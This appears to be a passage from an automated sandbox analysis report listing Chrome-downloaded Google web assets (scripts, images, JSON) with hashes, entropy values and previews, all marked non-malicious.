                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB...,.....pHYs...............\PIDATx...w.H..{......=..tw.V.U.i7....IQt......y..2....)........-.0.......M.!..B.!$....w..B.!..BH4...B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4...B.!...Sh..!..B.!$....B.!..BHL.!$..B.!...BCH.!..B.!1....B.!..Bb..!!..B.!....BB.!..B..)4.SC..j6.......P....?!..B.!$rh.'..x<.....Z.G.?ZDB.!..B....)....j7.m...n.{..Zv...k..Ukf_.c.0......5...z<...o.|N..B.!......N.b...!.7.9.:1~0x.r...Z_...T....%.U..y.Fc....$..B.!df.!.PB......>../._W,U ........w>_..j5.4m.v]W...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):215771
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.527442138518943
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DJ+6L9F/dcVoIqz3DxXEzmnBBBpELq/N6p/kn6Z4vBk7SzCCdwDGslfjiCCc4DRH:9+6L9F/dYoIqz3DxXJnBBBpELq/N6p/Y
                                                                                                                                                                                                                                                                                          MD5:2C5632581BAA068AF863120FAB3D9754
                                                                                                                                                                                                                                                                                          SHA1:810725251933CC8B8F221B2A9CB53B8880673CB3
                                                                                                                                                                                                                                                                                          SHA-256:A54C42C7516DB8E00412BDAB6DD5201FC040960A60DB5030AE6E3CD1B1DD3829
                                                                                                                                                                                                                                                                                          SHA-512:2C517C18982E145EE1670DF6C2F8E13525E2913633340D14C5168E85950E8724A3D7D6C46085A49CF6ACBDA85538E60C08155738944E4CF1B966FED4C6513A40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=qabr,q_dnp,qcwid,qapid,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTv3Qzh6Ja6eSLzWU_FOQIMZM5uKUQ"
                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{.var Le;Le=0;_.Me=function(a){return Object.prototype.hasOwnProperty.call(a,_.Qb)&&a[_.Qb]||(a[_.Qb]=++Le)};_.Ne=function(a){return _.Pb(a)&&a.nodeType==1};_.Oe=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.Ie(a),a.appendChild(_.xe(a).createTextNode(String(b)))};var Pe;_.Qe=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""||c==void 0?(Pe||(Pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Ue;_.Te=function(a,b,c,d,e,f){if(_.uc&&e)return _.Re(a);if(e&&!d)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7312)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7313
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.220242897129581
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:39cfMDD/MtzNcAckTY4aTyfsw3k9h9Fbv7woVSslTD7yVYq8b5ruDn:35DHEY4aTy0w3krkqJd7yItub
                                                                                                                                                                                                                                                                                          MD5:C3C6072E52B261F2A087E42626C49812
                                                                                                                                                                                                                                                                                          SHA1:C2184D5E3ECF76A2924C243472683BBC206EEB94
                                                                                                                                                                                                                                                                                          SHA-256:29F60A110A7068232C71C77E447D04EB85B9DF16B4AC555E2B8D427BEBAFFB3B
                                                                                                                                                                                                                                                                                          SHA-512:06C88912FCBA138F9A060513658CFE9D8889D5CD9DF3EBB55254B5954065896154FA5D804DD1BE8743837D917C1E48CB329C9940DD3A094C7E275608CC3253FD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/rwBjrn-0.min.js
                                                                                                                                                                                                                                                                                          Preview:function h(){return/iPhone|iPad|iPod/i.test(navigator.userAgent)||m()}function p(){return/Android/i.test(navigator.userAgent)}function m(){return navigator.userAgent.toLowerCase().indexOf("macintosh")!==-1&&!!navigator.maxTouchPoints&&navigator.maxTouchPoints>2}var u=class{constructor(){this.loadedScripts={},this.disposed=!1}load(t,e){const i=this.loadedScripts[t];if(i)return i;const s=new Promise((o,a)=>{if(e.test()){o();return}this.renderScriptTag(t,e);const r=Date.now(),c=e.timeout||5e3,l=()=>{if(this.disposed){a("script loader is disposed");return}if(e.test()){o();return}if(Date.now()-r>c){a(`failed to load ${t} due to timeout`);return}window.requestAnimationFrame(l)};window.requestAnimationFrame(l)});return this.loadedScripts[t]=s,s.catch(o=>{console.error(`failed to load ${t}`),console.error(o),delete this.loadedScripts[t]}),s}renderScriptTag(t,e){const i=document.createElement("script");if(e?.attrs)for(const s in e.attrs){const o=e.attrs[s];i.setAttribute(s,o)}i.src=t,document.b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1177525812347575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tvCF61JzhgMgsbkCx0J8A9IKLkmbmtSqYzzfXFGtetUw/QOCUpM9YNrhykm:tZ1x0uwdqKL3bfqY9MetU6QeM9Y3Hm
                                                                                                                                                                                                                                                                                          MD5:E3598D780C8FF8607121797205734033
                                                                                                                                                                                                                                                                                          SHA1:631285F021305066437DB867C371AF1EC2E131E2
                                                                                                                                                                                                                                                                                          SHA-256:B95E30C771A3B8FCDF7ABCBC7A5C926D28ADD773E737742A64157406B5E0D973
                                                                                                                                                                                                                                                                                          SHA-512:21829FE3E70E1FF1E14643F062F212DC48A27234364AA2E477A4346B2AF8E9E536CED8673C1CECC31F623227189811EAEC00F58BE1EC7679956FA34D0532BAFF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg id="GoogleG_FullColor_rgb" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 24"><defs><style>.cls-1{fill:#4285f4;}.cls-2{fill:#34a853;}.cls-3{fill:#fabb05;}.cls-4{fill:#e94235;}</style></defs><title>GoogleG_FullColor_rgb_24px</title><g id="_24px" data-name="24px"><path class="cls-1" d="M23,12.27A14,14,0,0,0,22.81,10H12v4h6.09a6.75,6.75,0,0,1-2.36,4.09v3h3.79A11.87,11.87,0,0,0,23,12.27Z"/><path class="cls-2" d="M11.75,24a11.08,11.08,0,0,0,7.77-2.91l-3.79-3a6.94,6.94,0,0,1-4,1.16,7,7,0,0,1-6.59-5H1.26v3.09A11.72,11.72,0,0,0,11.75,24Z"/><path class="cls-3" d="M5.16,14.29a7.09,7.09,0,0,1,0-4.58V6.62H1.26a12.12,12.12,0,0,0,0,10.76Z"/><path class="cls-4" d="M11.75,4.75a6.33,6.33,0,0,1,4.51,1.8h0l3.35-3.42A11.15,11.15,0,0,0,11.75,0,11.72,11.72,0,0,0,1.26,6.62l3.9,3.09A7,7,0,0,1,11.75,4.75Z"/></g></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (736)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3516
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.548775726691877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ZfSAWM+fMBryd293y+qrocut9Q4msFNC02W5RfNXqzyvBMB6HsByJx8qVKuShZz2:81KrW63y+OocQ9t9bv1qzyVxrSxax
                                                                                                                                                                                                                                                                                          MD5:7437D4F7DC4BAF6E88AB554CDA0B28F4
                                                                                                                                                                                                                                                                                          SHA1:E36353C07E1E38FD6DBAEEE10FD790B580A7FD23
                                                                                                                                                                                                                                                                                          SHA-256:6F2317A8A8668F3043C0A8B24292A3130BAF965BEBB0E8914A4EEA3D16586C95
                                                                                                                                                                                                                                                                                          SHA-512:6C11487D4AD06F67C0E526525FE13CAFDFCAEC62CFC9A944075733119DCC70B2075C6AA933E84A4F6A8A8A3375EDDA1A4FD855E5B219BC5E87BD9331D68EF53E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("Wt6vjf");.var Lz=function(a){this.ta=_.y(a,0,Lz.mb)};_.G(Lz,_.C);Lz.prototype.Xa=function(){return _.ll(this,1)};Lz.prototype.oc=function(a){_.xl(this,1,a)};Lz.mb="f.bo";var Mz=function(){_.Go.call(this)};_.G(Mz,_.Go);Mz.prototype.ab=function(){this.ar=!1;Nz(this);_.Go.prototype.ab.call(this)};Mz.prototype.j=function(){Oz(this);if(this.lk)return Pz(this),!1;if(!this.ks)return Qz(this),!0;this.dispatchEvent("p");if(!this.qp)return Qz(this),!0;this.bo?(this.dispatchEvent("r"),Qz(this)):Pz(this);return!1};.var Rz=function(a){var b=new _.su(a.yx);a.cq!=null&&b.l.set("authuser",a.cq);return b},Pz=function(a){a.lk=!0;var b=Rz(a),c="rt=r&f_uid="+_.Ll(a.qp);_.kq(b,(0,_.E)(a.l,a),"POST",c)};.Mz.prototype.l=function(a){a=a.target;Oz(this);if(_.rq(a)){this.hn=0;if(this.bo)this.lk=!1,this.dispatchEvent("r");else if(this.ks)this.dispatchEvent("s");else{try{var b=_.uq(a),c=JSON.pars
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17791
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.992294496906227
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:qSZCQu7M1rqMTdgnhPWA1lO11oyAkZt/tKxOnYhVh785C:qz7M1rqMTOPHvslZt/twOnAfCC
                                                                                                                                                                                                                                                                                          MD5:20CCBA6D3757FA6658A93E4B720BF007
                                                                                                                                                                                                                                                                                          SHA1:962064A858552C03D1E91C65F10AF944FE9041A8
                                                                                                                                                                                                                                                                                          SHA-256:080CD0A95B598A06DF0C20011D358F4C0A8D6BEC109BD922DC76891D230905C6
                                                                                                                                                                                                                                                                                          SHA-512:CA55DA7EA6D7659EF834B22B55C2B34D2542BFC0F9887FBC236AD89B2FE6C7FFF00AF8F1307C50502B177A2DF30FB2783E5079C977BCB558FDCC09E626F27189
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"meta":{"total_count":362},"next_page":"/api/v2/latest?paginate=12&tags=sustainability&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\" aria-label=\"September 19\">Sep 19</time> / Data Centers and Infrastructure","go_live_date_time":"2024-09-19|13:00","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/Omaha_1.png","tags":"data-centers-and-infrastructure,sustainability","summary":"How we.re approaching sustainability in Nebraska to support our data center operations in the state.","category":"article","author":"Ben Townsend, Amanda Peterson Corio","tag_name":"Data Centers and Infrastructure","sitespace_render":"","sitespace":"","word_count":727,"published_readable_date":"Sep 19","tag_eyebrow":"https://blog.google/inside-google/infrastructure/","published_node":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\">Sep 19</time>","full_url":"https
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):419336
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.286208964696697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:bn2EVs0K0aSCDlGgfxHH2xYk6ToounAmhY:bn2EVgTRVNHxUov
                                                                                                                                                                                                                                                                                          MD5:26AE8FE62168787666397F9DF92C503D
                                                                                                                                                                                                                                                                                          SHA1:C575FAF0432AC2DC8CD588F24FBB8B930738B770
                                                                                                                                                                                                                                                                                          SHA-256:B8EA464A09AECDF1D03EC5CDD6A182ED47B8C0F87E754EA48E9A1B87440BE013
                                                                                                                                                                                                                                                                                          SHA-512:E41530C3545CF682873C066801BAD6F85C44883FB1624C8698061CC8A6EC2D8FCF61EA43AC23A17A4A0EEB01081014287D7AD6BFF6521591B2DAF72BC8DDBD46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.f..WEBPVP8L.e../..D..u!...R...d.Q.w."b..o.vq..;s7S.......6.....U.JV+..V<...(-........0....\vl....b..gg.O..g7...=..1...!.f.!&.\v...`.0...(...m.-....V=._......y8A.....8.....HvEN.4....*S3..a..mog.....1...d.pb;...5.;U....s...y#I....#.$....dQ.-N.....i)e..|.Y7Jy..._....X......Hy...).={d.K.e!.9...`....._..m........z..tX.s.......19.;E9e6.7;e..7.....fl.#.9.>..g.........b...\...R..9@...E..i...^2.$....3..#1+#_f....ri./.]..Y..g.i./.`Vw.q...M.e..Gu..N..l..:%.$I........s.x7..e.7.:.6...m.\7....ft......Q.c.Y....x=g..,..G.....E..(.o.{-.6lm..../..8 .....P..... ..(.... ........ ..7Q:z.........8r...$...P..K`Y..*.f.hg..F[c..v..r.y......*......w,.......D....R.u.....L4A. .S......o..U.k..4s...z.....E.2..A..g.y..n#I..e.#..%......8....;....Gq..l/..).^.. ...A.n[..m.G..d..".+...l......r...8T.aj.0.w..$H..6.f....>.......m.m..Cd...N.'.g..y....xRr^.....d.d.1.}?...i.i....3..Mz.....Iv.69|K.]V.|......................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4657
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.917223420242452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:f+tcvjYJuBvnUAXd1XpD62cq2fDlFyANmVlL9MdpU9wo7:ac0WvXpG2BcflgGDKwo7
                                                                                                                                                                                                                                                                                          MD5:167A8D64D846EDC2B009636D17582BDD
                                                                                                                                                                                                                                                                                          SHA1:7ECCA71578241BE5F51C3AF478F5D60F95E6E191
                                                                                                                                                                                                                                                                                          SHA-256:576A0A869E77E5A405BA34854CA7D3F290D5FBD9973E58B11B9B548DE850E172
                                                                                                                                                                                                                                                                                          SHA-512:2C7A0C317ACCC779DA4F284E648746A2C2F41FF722DF0B7887D805404DAEB122A1446DA94BB1AE324EA37827FC3F16FDB2739281EEAC4BDB0CAE772BCA768D3F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/vNgpLTvnDUr6-QM8s4OuuESGDXs_brbGoPR-7vfwdxQI7M4MVFV0CC_Hil4qRDSp4P66ik85fdv09jKn89kDAJVknIbd6wkl0zGQJQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...`...`......w8....IDATx..{PTW..[k...<v3.......[....d..DFE$F.FD......1..b#...J4`DEEC"....AA.A..#.."..v..8[....7{i.}.^NG...o54M..|....M..M..6.&.D.h.J..Z.z}{zz....r.c...@..b.4......G...=..M.R.u.K.$I...9..l.h.......5.......!1...[[[.............^....8...AY_X.........-...O.'-~..I%.|~. ...8...%..0ASS..wO......Gp.8.r..IdB~.DB..I.y}.Y.a=.,.kX...G...{.....PVV&Khoo.{.+G..t.01....o...>6..8d....)...Df.Aaa!...Css3tvvr{...m.q+.......O.^.8d..bW.d.s..................h,.&..zC....O..j..L.W.+'.^..,C...^.......e,C..D.P....z..r.vZ..;0.G.OQ../C...............K..!WIx.zC.....u.W....L..E{.p....5.X......klVT.uuu...."...e.J.......>...?}...S.%..Cy.@e....n...o.......7.b.w\...1{/M..7......k*C...r..q..........0.'.K...l.NA.|.z..*C8..2t..-y}...."W....k.q3.n.b..#.........).,.K.;w...8.rtn\..[.J1.........].r........,E..@.H.'..'..5...^.z.....2.....Z..............s...@.2*C.LY.P..W.(...0V.5.;../.......Q..Y.f.K8......&...@.h.w...90.!..n..2d2......H.*..7.b..3..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1575)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1576
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.237031381029663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:+lJyMLDxBEJj7lrq70uKnmAfhnldFhZyFRRcUymtIV87VfVopIqyzjWFEj8bE:jMZBSq70hnmAJthCLyW889q2+Ej8bE
                                                                                                                                                                                                                                                                                          MD5:B2FBFE121EBB31210C9F5A9823BA1F0C
                                                                                                                                                                                                                                                                                          SHA1:40EFB691CB62F552EC3357AF3AE4113D54411BC3
                                                                                                                                                                                                                                                                                          SHA-256:A302CD15D9075C3BD242F46A33BD8F5E72F07D669076C8972BA3D1E03125A3D3
                                                                                                                                                                                                                                                                                          SHA-512:B07315A1ADFF21FEC8382F34CCA7B5F8E3F2B0631488653A589CD872A867F21E94637AF38A3A0EAB27239134A24D7B06FAC7F47203AABA25F41686D74065F2BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{s as l}from"./ycaG4YXp.min.js";import{e as f}from"./0XPwTFcg.min.js";function h(n){let e=window.location.search.split(n+"=")[1];return e=e&&e.split("&")[0],e||null}function d(n){const e=n.substr(1),r={};return e.split("&").forEach(a=>{const t=a.split("=");t[0]!==""&&(r[t[0]]=decodeURIComponent(t[1]))}),r}function u(n,e){Object.entries(n).forEach(([r,a])=>{e(r,a)})}var m=Object.defineProperty,w=Object.getOwnPropertyDescriptor,b=(n,e,r,a)=>{for(var t=a>1?void 0:a?w(e,r):e,o=n.length-1,s;o>=0;o--)(s=n[o])&&(t=(a?s(e,r,t):s(t))||t);return a&&t&&m(e,r,t),t};let p=class extends l{connectedCallback(){super.connectedCallback();const e=h("version")==="2"?"approach-feature-cards":"approach-5050",r=document.getElementById(e);r&&(r.style.display="none")}async firstUpdated(){await this.updateComplete,this.preserveParams()}preserveParams(){const n=Array.from(document.querySelectorAll("a[href],hsw-button[href]")).filter(e=>e.getAttribute("href").startsWith("/"));this.appendUrlParamsToLinks(n,[
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2718
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.880291072349662
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:mbgJeNEkhZEXQmJ46VJrAJ8cjig5oTK3FvXNnLj9TM7aFXGxVbI7sti:mbyCOQmJ4mE8cH5o21vhd/M+
                                                                                                                                                                                                                                                                                          MD5:35D265D275688C64B4EADC82DCF95AC9
                                                                                                                                                                                                                                                                                          SHA1:1C678D990EE7B755F1C6EEF1F9409CB76450C620
                                                                                                                                                                                                                                                                                          SHA-256:0E41E36790294DE89ABCEE52F8682F393C704D474F4960A5255536BF8823F1C8
                                                                                                                                                                                                                                                                                          SHA-512:C1F98E199EEDCB06A9AF7B7C5025CAABFBC2449B2F0FA814A8A8FC7C203E935D02D9481C6DD72341B2B1E459245AF3C66E98942F124CF8AC133719A6E5B79D38
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/uPpZapQO32gCKWztePKdTRzpg7rCr4_40vlgIAslU9JyF135ZdGvC33DbzA2mdmOTNK6qgbu7xWfKkR9rfJUwaK20saGLsFW9yw014GdOKBVEN9zow=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....UIDATx...}p.........KxIHHC.D."/A.`+.....H[...P(..:..3..`u.Vf.....u....$Bx.2L...wF.H.)p.TH$... ...>O.......gow...3.=........=.(..(..(..(..(.......4<.f....{`.d$.. b..!8.P..Y.b.`.....\N.U..B.......!.!Y.....".U...d9.0..N.....# r...-..l.zVJ.......2...#..H..:.,.....(u.<cn....rD[.......!..%.....#..<..._~...!.._...;..G........g.=f<.....=.......Y..}..Le....>.9i..7.......0](... .}X!..6n...n.........>..g...8.v..@.x.6.].v.L.g..#....K^......'>/Bws../..#...,..Gt...?....-.=S....w.....?......^..O......7/f....?qq..^.S.Of.8...k....iy9[....,.......l......n'H...._.....v.z.y....._p;BZ^...........iy9[......v0....1=..._0...q;B/^........p;B/^.../...m.q....TO..s....Z...#|.KY....W.<..X2.Ox......N0c..1..5X_....)...`... .HW.M..[.y.+..?38%Tv.-.m..W...m.<jF^.....f`...mT......F.CA....L.((..u#.9.1.......J..S..........q.01,y..w.)..w...H.Zh76W.:......u.......Hk.y,..`.~` .....|.E.S...<.0.....X`.@k.y.....W...6U........*...\.@..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):12020
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.3974313983663706
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Yeb7c/dMQpRHqwhPIxt9OqNa2JV9iAoul66BDu5JUroEPXPa5q3Ld7vlAvhWxh:iD8+YDxh
                                                                                                                                                                                                                                                                                          MD5:47903186BD600D99B9F1504193BBBC0E
                                                                                                                                                                                                                                                                                          SHA1:7BBCB0BCF5DFF9CEA8503F84EA5BE4A0736ED365
                                                                                                                                                                                                                                                                                          SHA-256:78CB7394E326BAEDB6BEA727710B4A12369CDE77C3636448FE5E01C34A94ED8C
                                                                                                                                                                                                                                                                                          SHA-512:E384C202D543668B17911B47C3C25D60424E4EF4DA8821624EA4DF25FFBD79C861C4D988182E09FAEB1B3FE3405BA7988D8A6ACF15B8B045A4B1F7A1023C6166
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA
                                                                                                                                                                                                                                                                                          Preview:{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111110110111111111110101111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101110111111113101101111111111110111111111111110111111111111111100011011111111111111111111111110101002222222212212212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212122212121212121212122212222221221221211122121212121212121212121212121212122212121212121212121212121212121212121212222122122122212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212121212122212222222222212122121121221212121212121221212122121212212112121212121212122222222121112112222112121212122121212121212122121222222212212212212212112121221212
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5861
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.954435489714076
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:7xRpMylJ9V5WXKy+RXvO4xaeLjpso8q0T8qzs8O5+PDwjhBj4bskzhIRwUThees/:7xfMyJ75TRGe1jna8+rPcD2skzhIRLXi
                                                                                                                                                                                                                                                                                          MD5:8FBB7A3499527F1FC92935F48E53BC7D
                                                                                                                                                                                                                                                                                          SHA1:94D59C2F201D4693322B059CC9A5967D7A44C43B
                                                                                                                                                                                                                                                                                          SHA-256:758AAEA9633BEA69708DBD8F34E80E121DA30437B2F2A7A3A046ED595D443E0B
                                                                                                                                                                                                                                                                                          SHA-512:5B90B70290924C0D1954E6EB50290410CF9D9457E863591E0F38D95646B124BBFBD2CCE381F59C8CA74571237A3F78AACFE8A073AE064C6B2B05E7EB91853264
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/JtYUq9HfkkOryxudgp34oqI8qFu9a6mmL64OXjcDX7mfEwcX_pxmTdurvxssofY4swTY2c_M1Kk5o1a863CGTiBZkxxuYXfjiNgz=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..k.$Gu....g.>.m..........8...Qd.........!..@..K"%.!G.E."..R.$..........b;....../.......Nw...._wfvw.R......S...SL1..SL1..SL1..S. .$..|....-....v....\9.wmr...|....4...........umr_-.U.....#..j.7..H..)33{X..o.~p...5.....f...A.M.^"6*...~L..m.oouG.y.I..W......|....#.4.Z.l...B......n...Oc!...+7.....\....m..4..$C@m.:.>.6..4}=.....^...o..f....O....=M*]@G....x.l,.V...A7Y&..4`....2...sRFK..........h......-...;$\9..=c .......l.......v9...KO.A....g............z}...%8.R5.d.u........R.,].......SDg.Z.)....iP...I[.}..pk4ES..a.X...*..E...c....:.<95../t"..0.....,U...j....[..W.#..'.....3.8...4.<.t...P....=......}..-..=:g>.|#.'.....l...q+...=.;.&......2s]..........D..Ut..uW.zr..Y.../..]...[....+.gW,.@t..8.*.?.-..H`@<@.2.!.]%.s.........9..g...]B0(...wb/~...z...Hy.x.0=z55....%d.Y8.(..{..`O.,n..... [.Uuw]...8.}.....s....D..Kt....9.....8..n..#....Dv].\.AL.(..."G.....F.......D'..e..9....]..:*>...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
